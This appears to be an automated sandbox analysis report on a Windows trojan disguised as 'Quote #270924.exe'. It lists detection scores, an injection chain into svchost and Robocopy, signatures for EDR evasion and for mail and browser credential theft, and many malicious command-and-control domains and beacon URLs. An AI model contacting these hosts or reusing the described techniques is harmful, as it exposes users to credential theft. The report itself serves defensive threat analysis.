            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520627 Sample: Quote #270924.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 28 www.030003302.xyz 2->28 30 www.tracy.club 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 Quote #270924.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 HoiWfznxKU.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 Robocopy.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 HoiWfznxKU.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.tomtox.top 162.0.238.43, 63711, 63712, 63713 NAMECHEAP-NETUS Canada 22->34 36 www.nojamaica.net 160.251.148.20, 63723, 63725, 63726 INTERQGMOInternetIncJP Japan 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Quote #270924.exe37%ReversingLabsWin32.Trojan.Generic
            Quote #270924.exe100%AviraHEUR/AGEN.1321671
            Quote #270924.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            030003302.xyz
            		65.21.196.90
            		truetrue
              		unknown
              www.martaschrimpf.info
              		208.91.197.27
              		truetrue
                		unknown
                www.nojamaica.net
                		160.251.148.20
                		truetrue
                  		unknown
                  www.b5x7vk.agency
                  		172.67.165.25
                  		truetrue
                    		unknown
                    www.tomtox.top
                    		162.0.238.43
                    		truetrue
                      		unknown
                      tracy.club
                      		3.33.130.190
                      		truetrue
                        		unknown
                        searchgpt.homes
                        		3.33.130.190
                        		truetrue
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truetrue
                            		unknown
                            www.alphaaistore.com
                            		208.91.197.39
                            		truetrue
                              		unknown
                              2q63f.top
                              		38.47.233.19
                              		truetrue
                                		unknown
                                www.48vlu.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.2q63f.top
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.030003302.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.popin.space
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.searchgpt.homes
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.tracy.club
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.sppsuperplast.online
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.tracy.club/e55r/?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg==true
                                                		unknown
                                                http://www.searchgpt.homes/974s/?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxKtrue
                                                  		unknown
                                                  http://www.martaschrimpf.info/7kkb/?6RGD=r8eHwnMpb2dxK&Ah=Vuf7L1aATO5bukV8eQdUIEmIaPgQ1yOpdgGCLe1WZLTuWrNT4xutTpWyFskV9eTAAXQRhMy7Zgc6S7zaREH9Qt7yJDZ+mejpqMKnoLgUtbmjvcVg7/Biou/HjIkaZAov/Q==true
                                                    		unknown
                                                    http://www.alphaaistore.com/xf5b/?Ah=bUc8Ed0aZESOAy+KJaIejJlAhDqRJymtCfRMAnUAQR11I0sOX+AQaEFDTlraWU4+rT7gLfO5Dt9FKcAEmJO6tRh3wQ1OL/3vPyqK0hsKckbG/SsYmEPJIzY3hoX+M0Wr3w==&6RGD=r8eHwnMpb2dxKtrue
                                                      		unknown
                                                      http://www.searchgpt.homes/974s/true
                                                        		unknown
                                                        http://www.2q63f.top/mkti/true
                                                          		unknown
                                                          http://www.martaschrimpf.info/7kkb/true
                                                            		unknown
                                                            http://www.nojamaica.net/bie8/?Ah=MA/0DFY0DiyH2olo7m8hVrrP5UH/jhcgcmWioqAK+793cplJM4qg3DyTQ66FMurZmF9Te+JpNl4zVYtM50IcS4zemXuWAdJhdKdflRI3BWRfqiAf3s5RU6wyOr9MBb+x+g==&6RGD=r8eHwnMpb2dxKtrue
                                                              		unknown
                                                              http://www.alphaaistore.com/xf5b/true
                                                                		unknown
                                                                http://www.b5x7vk.agency/f66t/?Ah=wMNxngytVvT+xiDvhZKVBLBZglmuZQUCx/WcIyOXqUp4vIwezETUsTI6SXRinkgbo4oPfyScfq3TTLYR3fLN41mF5bem5ZFkurSKCCFsELulDfuy7v5fTUVM4J27kpDPZg==&6RGD=r8eHwnMpb2dxKtrue
                                                                  		unknown
                                                                  http://www.030003302.xyz/1nuz/?Ah=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4Oq8ZNp7wpFj1U/P2B+qNM5mXkMr/9uw3rZ9uOJdcOYzpfEQ==&6RGD=r8eHwnMpb2dxKtrue
                                                                    		unknown
                                                                    http://www.2q63f.top/mkti/?6RGD=r8eHwnMpb2dxK&Ah=jnThCjOJiNX3HI/1X6ra8iqRT8LvO5Bl0cjrkRPRR4aUtJ5UnZH8goi0lUnBvvC66wXnOPoFvnQ+LE8o+1Q4j9xZYpeOMfjH2lF0fJzOXlNgjT3mfY10J4nKlD3uClfrXg==true
                                                                      		unknown
                                                                      http://www.nojamaica.net/bie8/true
                                                                        		unknown
                                                                        http://www.b5x7vk.agency/f66t/true
                                                                          		unknown
                                                                          http://www.tomtox.top/3nd4/true
                                                                            		unknown
                                                                            http://www.tracy.club/e55r/true
                                                                              		unknown
                                                                              http://www.tomtox.top/3nd4/?Ah=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs3GrmtSbeGOpl3yeERPUVozEPpEyzLyJ+XoeluijW2G1r0A==&6RGD=r8eHwnMpb2dxKtrue
                                                                                		unknown
                                                                                http://www.sppsuperplast.online/zmf1/true
                                                                                  		unknown

                                                                                  URLs from Memory and Binaries

                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://duckduckgo.com/chrome_newtabRobocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://dts.gnpge.comHoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://duckduckgo.com/ac/?q=Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://cdn.consentmanager.netRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.Alphaaistore.comRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.alphaaistore.com/Church_Video.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYCNq%2Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://i2.cdn-image.com/__media__/pics/28903/search.png)Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.martaschrimpf.info/Matt_Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S68Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.alphaaistore.comHoiWfznxKU.exe, 00000006.00000002.3987877558.0000000004E9E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.martaschrimpf.info/Music_Production_Schools.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://www.register.com/whois.rcmx?domainName=Alphaaistore.comRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.martaschrimpf.info/__media__/design/underconstructionnotice.php?d=martaschrimpf.infoRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRobocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.martaschrimpf.info/Buy_Music_Online.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.martaschrimpf.info/display.cfmRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.alphaaistore.com/display.cfmRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://delivery.consentmanager.netRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.register.com/?trkID=WSTm3u15CWRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.alphaaistore.com/Christian_Website.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpgRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.martaschrimpf.info/Music_Video_Production.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.martaschrimpf.info/__media__/js/trademark.php?d=martaschrimpf.info&type=nsRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.Martaschrimpf.infoRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.ecosia.org/newtab/Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.alphaaistore.com/__media__/js/trademark.php?d=alphaaistore.com&type=dfltRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.alphaaistore.com/Christian_Private_Schools.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJhRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://i2.cdn-image.com/__media__/pics/29590/bg1.png)Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.alphaaistore.com/Alpha.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYCNq%2BtSB73nRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.alphaaistore.com/The_Christian_Faith.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmSRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.register.com?trkID=WSTm3u15CWRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
